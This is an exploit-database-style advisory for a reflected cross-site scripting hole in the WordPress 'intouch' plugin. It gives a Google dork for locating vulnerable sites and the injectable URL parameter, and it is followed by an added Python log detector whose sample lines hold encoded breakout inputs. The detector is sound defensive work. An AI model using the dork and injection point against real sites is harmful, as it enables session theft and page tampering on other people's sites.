WordPress Intouch Cross-Site Scripting Vulnerability

######################
# Exploit Title : WordPress intouch Cross Site Scripting Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/intouch/
# Google Dork : inurl:/wp-content/plugins/intouch/
# Date : 2013/01/01
# Tested on : Windows 8 , Linux
# Version : 2.0
# Software Link : http://downloads.wordpress.org/plugin/intouch.zip
######################
# Exploit : Cross Site Scripting
# Location :
http://[Target]/wp-content/plugins/intouch/intouch.js.php?intouch_failure=[XSS]
#
# Proof:

######################
# discovered by : Spoof
######################
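
Added detection example (not part of the original advisory and not the plugin's code): a log check that flags requests to the script and parameter named in the "Location" line when the decoded value carries markup or quote characters. It assumes common/combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter name come from the advisory's "Location" line.
PLUGIN_PATH = "/wp-content/plugins/intouch/intouch.js.php"
PARAM = "intouch_failure"
# Characters that let a reflected value leave a quoted attribute or JS string.
BREAKOUT = re.compile(r"[<>\"'`]")
# Request line of a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (line_number, decoded_value) for probes of the reflected parameter."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a parseable request line
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith(PLUGIN_PATH):
            continue  # a different script, or a different plugin
        for raw in parse_qs(target.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)  # parse_qs has already decoded once
            if BREAKOUT.search(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /wp-content/plugins/intouch/intouch.js.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2013:10:00:05 +0000] "GET /blog/wp-content/plugins/intouch/intouch.js.php?intouch_failure=%22%2F%3E HTTP/1.1" 200 530',
    '192.0.2.12 - - [01/Jan/2013:10:00:09 +0000] "GET /wp-content/plugins/intouch/intouch.js.php?intouch_failure=%2522%252F%253E HTTP/1.1" 200 530',
    '192.0.2.13 - - [01/Jan/2013:10:00:12 +0000] "GET /wp-content/plugins/intouch/intouch.js.php?intouch_failure=1 HTTP/1.1" 200 514',
    '192.0.2.14 - - [01/Jan/2013:10:00:15 +0000] "GET /wp-content/plugins/other/view.php?intouch_failure=%3Cb%3E HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {PARAM}={value!r}")
```

Hits on a site that still has the plugin installed are a reason to remove or update it; the durable fix is for the script to encode the parameter for the JavaScript context before echoing it.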